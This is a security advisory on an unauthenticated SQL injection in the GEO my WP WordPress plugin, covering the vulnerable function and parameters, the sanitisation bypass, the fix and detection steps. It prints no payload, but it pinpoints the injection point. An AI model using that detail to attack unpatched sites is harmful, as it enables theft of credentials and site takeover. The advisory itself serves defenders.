An unauthenticated SQL injection vulnerability in the GEO my WP WordPress plugin, tracked as CVE-2026-9757, allows remote attackers to execute arbitrary SQL queries against the WordPress database without any authentication. The vulnerability carries a CVSS score of 7.5 and is notable for bypassing WordPress’s built-in input sanitisation mechanisms — making it trivially exploitable against any internet-facing site running the plugin.
What Is the Vulnerability?
CVE-2026-9757 is an SQL injection vulnerability in the GEO my WP plugin’s location search functionality. The vulnerability exists in the gmw_get_locations_within_boundaries_sql() function, which processes the swlatlng (south-west latitude/longitude) and nelatlng (north-east latitude/longitude) URL parameters to construct SQL queries for geospatial searches.
What makes this vulnerability particularly dangerous is how it bypasses WordPress’s standard input sanitisation. Normally, WordPress’s wp_magic_quotes function automatically escapes user input from $_GET, $_POST, $_COOKIE, and $_REQUEST superglobals. However, the GEO my WP plugin reads the vulnerable parameters directly from $_SERVER['QUERY_STRING'] via PHP’s parse_str() function — a source that WordPress does not automatically sanitise. The unsanitised parameter values are split on commas via explode() and then interpolated directly into a SQL BETWEEN clause without any escaping or parameterisation.
An attacker can supply malicious SQL fragments in the swlatlng or nelatlng query parameters of any URL that triggers the GEO my WP location search, extract data from the WordPress database — including user credentials, password hashes, and application secrets — and potentially escalate to full site compromise.
The vulnerability is classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command):
- CVSS v3.1 Score: 7.5 (High)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
- Impact: High on confidentiality, none on integrity and availability (C:H/I:N/A:N)
Which Versions Are Affected?
The vulnerability affects all versions of GEO my WP up to and including version 4.5.5:
- GEO my WP — Geolocation, GeoDirectory, Maps: all versions up to 4.5.5
The fix was released in version 4.5.6. If your WordPress site is running GEO my WP version 4.5.5 or earlier, it is vulnerable.
Is It Being Exploited in the Wild?
No active exploitation has been publicly confirmed at the time of writing. However, unauthenticated SQL injection is one of the most dangerous vulnerability classes for web applications, and the specific technique used here — bypassing WordPress’s automatic input sanitisation via $_SERVER['QUERY_STRING'] — makes the vulnerability trivially exploitable. Any internet-facing WordPress site running this plugin can be compromised with a single crafted HTTP request. SQL injection vulnerabilities in WordPress plugins are routinely scanned for and exploited by automated attack tooling within hours of disclosure. Organisations should treat this as actively exploitable and patch immediately.
What Is the Fix?
The GEO my WP development team has released version 4.5.6 to address CVE-2026-9757. The fix corrects the SQL query construction in class-gmw-form-core.php to properly escape or parameterise user input. The official plugin page is available at:
https://wordpress.org/plugins/geo-my-wp/
Administrators should update GEO my WP to version 4.5.6 or later via the WordPress admin dashboard:
- Navigate to Plugins > Installed Plugins
- Locate GEO my WP
- Click Update to version 4.5.6 or later
- Alternatively, update via WP-CLI:
wp plugin update geo-my-wp
Recommendations
Update GEO my WP immediately. Unauthenticated SQL injection with no user interaction required is one of the most critical vulnerability classes for web applications. The bypass of WordPress’s built-in input sanitisation means exploitation requires nothing more than a single HTTP request with a crafted query string. Every internet-facing WordPress site running this plugin should be patched today.
Check for signs of exploitation. After updating, review your web server access logs for requests to GEO my WP endpoints containing suspicious SQL fragments in the swlatlng or nelatlng query parameters. Look for SQL keywords, UNION SELECT statements, or unusual character sequences in these parameter values. Any such requests should be investigated as potential exploitation attempts.
Audit the WordPress database. Check the WordPress users table for unexpected administrative accounts and review recent content changes for unauthorised modifications. If the database has been accessed via SQL injection, attacker-created admin accounts or injected malicious content may already be present.
Consider a Web Application Firewall. While patching is the only complete remediation, a WAF configured with SQL injection detection rules can provide a layer of detection and blocking for this and future injection vulnerabilities in WordPress plugins. Ensure your WAF inspects query string parameters — the attack vector used here bypasses some standard WAF rules that only monitor POST bodies.
References
- NVD: CVE-2026-9757
- GEO my WP Plugin Trac — Vulnerability Source
- Vulnerability Intelligence Report — May 31, 2026
This advisory was first covered in the broader Vulnerability Intelligence Report — May 31, 2026. For a comprehensive view of all active threats and newly disclosed vulnerabilities as of today, refer to the full report.
